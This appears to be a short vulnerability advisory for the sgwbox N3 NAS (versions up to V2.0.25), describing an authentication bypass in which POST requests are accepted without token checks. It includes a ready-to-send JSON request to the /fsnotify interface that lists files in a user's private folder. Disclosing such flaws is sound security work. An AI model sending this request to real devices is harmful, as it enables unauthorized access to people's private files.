Vendor: sgwbox
Affected products: N3 NAS ≤ V2.0.25
Vendor Homepage: https://mall.sgwbox.com/
Vendor contact information: mailto:box@new1cloud.com
The sgwbox NAS N3 has an authentication bypass vulnerability. This vulnerability is caused by the failure to actually verify the token field passed in the POST message. This vulnerability can be used to remotely and unauthorizedly disclose internal information of the NAS, manipulate the NAS device to complete specific instructions, etc.
Without authentication, an attacker sends a POST request message in JSON format to the /fsnotify API interface without any token information.
{
"jsonparam": "{\\"path\\":\\"/mnt/usb1/.safe_home/winmt/\\",\\"type\\":0,\\"hasbaseinfo\\":false,\\"limit\\":500,\\"folderonly\\":true,\\"regonly\\":false,\\"withhidden\\":false,\\"order\\":3,\\"desc\\":true,\\"baseinfo\\":{}}",
"protobufparam": "",
"cmd": "FSLIST"
}
It can retrieve file information from a user's private folder (which requires a password for normal users to access).
Note that this issue exists not only with this interface, but with all functions across all interfaces.
NASchecker